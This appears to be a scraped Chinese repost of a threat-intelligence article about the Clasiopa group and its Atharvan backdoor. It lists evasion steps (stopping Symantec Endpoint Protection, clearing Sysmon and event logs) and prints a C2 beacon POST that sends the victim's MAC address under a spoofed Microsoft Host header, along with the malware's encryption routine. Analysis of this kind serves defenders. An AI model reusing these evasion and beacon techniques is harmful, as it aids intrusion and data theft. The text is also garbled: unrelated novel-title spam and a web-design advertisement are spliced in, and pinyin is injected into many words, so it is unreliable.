斗破苍穹续集,梦入神机,懒人听书

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案

疑似印度黑客針對亞洲材料行業(yè)發(fā)起攻擊

研究人員發(fā)現(xiàn)一個未知的攻擊組織以亞洲一家材料行業(yè)的公司為攻擊目標(biāo)，被命名為 Clasiopa。該組織使用獨(dú)特的攻擊工具，開發(fā)了定制化的后門 Atharvan。

我們提供的服務(wù)有：成都網(wǎng)站設(shè)計(jì)、做網(wǎng)站、微信公眾號開發(fā)、網(wǎng)站優(yōu)化、網(wǎng)站認(rèn)證、慶元ssl等。為近千家企事業(yè)單位解決了網(wǎng)站和推廣的問題。提供周到的售前咨詢和貼心的售后服務(wù)，是有科學(xué)管理、有技術(shù)的慶元網(wǎng)站制作公司

Clasiopa 的 TTP

尚不清楚 Clasiopa 的攻擊媒介是什么，研究人員猜測是通過對外開放的服務(wù)進(jìn)行暴力破解獲取的訪問權(quán)限。

攻擊中還有許多特征：

利用 ifconfig.me/ip 獲取失陷主機(jī)的 IP 地址
試圖通過停止 SepMasterService 來停用 Symantec Endpoint Protection，再利用 smc -stop 徹底禁用安全防護(hù)軟件
使用多個后門來外傳文件名列表，列表存儲在 Thumb.db 文件或 ZIP 壓縮文件中
使用 wsmprovhost 清除 Sysmon 日志
使用 PowerShell 清除所有事件日志
創(chuàng)建計(jì)劃任務(wù)獲取文件名

在一臺失陷主機(jī)上發(fā)現(xiàn)了運(yùn)行的 Agile DGS 和 Agile FD 服務(wù)，惡意樣本被放置在名為 dgs 的文件夾中。與此同時(shí)，一個后門被從 atharvan.exe 重命名為 agile_update.exe。另一臺失陷主機(jī)上運(yùn)行著 HCL Domino 服務(wù)，但并不清楚這是否是巧合。但這些服務(wù)都在使用舊證書，還包含部分存在漏洞的庫。

攻擊工具

攻擊者使用了自研的遠(yuǎn)控木馬 Atharvan，以及開源遠(yuǎn)控木馬 Lilith 的定制版本。此外，攻擊者還使用了 Thumbsender 與自定義代理工具。

Atharvan

Atharvan 樣本文件在運(yùn)行時(shí)會創(chuàng)建名為 SAPTARISHI-ATHARVAN-101的互斥量，因此得名。

C&C 服務(wù)器硬編碼在樣本中，位于 AWS 的韓國區(qū)。POST 請求中，Host 被硬編碼為 update.microsoft.com。例如：

POST /update.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52
Host: update.microsoft.com
Content-type: application/x-www-form-urlencoded
Content-length: 46
id=Atharvan&code=101&cid=H^[REDACTED]&time=5?

請求參數(shù)如下：

id：硬編碼為 Atharvan
code：表示請求目的
cid：硬編碼字符后為失陷主機(jī)的 MAC 地址
time：通信時(shí)間間隔
msg：根據(jù) code 參數(shù)不同表示請求目的

在加密 msg 時(shí)，惡意軟件使用以下加密算法：

def encrypt(plaintext):
return bytes([((2 - byte) & 0xff) for byte in plaintext])?

惡意軟件使用簡單的 HTTP 解析工具在服務(wù)器響應(yīng)中提取信息，解密算法如下所示：

def decrypt(ciphertext):
return bytes([((2 - byte) & 0xff) for byte in ciphertext])?

獲取命令時(shí)，惡意軟件預(yù)期解密的正文由 \x1A 分隔的字符串組成。每個字符串的第一個字節(jié)用于指定要執(zhí)行的命令，其余字節(jié)為命令參數(shù)：

Atharvan 命令參數(shù)

配置計(jì)劃通信，命令參數(shù)指定時(shí)間與日期，編碼為：

無限制（0x16）
指定月中的天（0x17）
指定星期幾（0x18）

預(yù)制的通信模式是該惡意軟件的另一個不常見的特征。

歸因

目前沒有確切的證據(jù)表明 Clasiopa 的背景與動機(jī)。盡管 Atharvan 在后門中使用了印地語作為互斥體的名字（SAPTARISHI-ATHARVAN-101），而且 Atharvan 也是印度教的神明。后門向 C&C 服務(wù)器發(fā)送的 POST 請求為 d=%s&code=%d&cid=%s&time=%dtharvan，攻擊者用于 ZIP 壓縮文件的密碼為 iloveindea1998^_^。盡管這些細(xì)節(jié)可能表明該組織位于印度，但這些信息也可能是作為虛假 Flag 植入其中，尤其是密碼似乎過于明顯。

文章名稱：疑似印度黑客針對亞洲材料行業(yè)發(fā)起攻擊
瀏覽地址：http://fisionsoft.com.cn/article/cocjdgo.html

新聞中心

Clasiopa 的 TTP

攻擊工具

Atharvan

歸因

其他資訊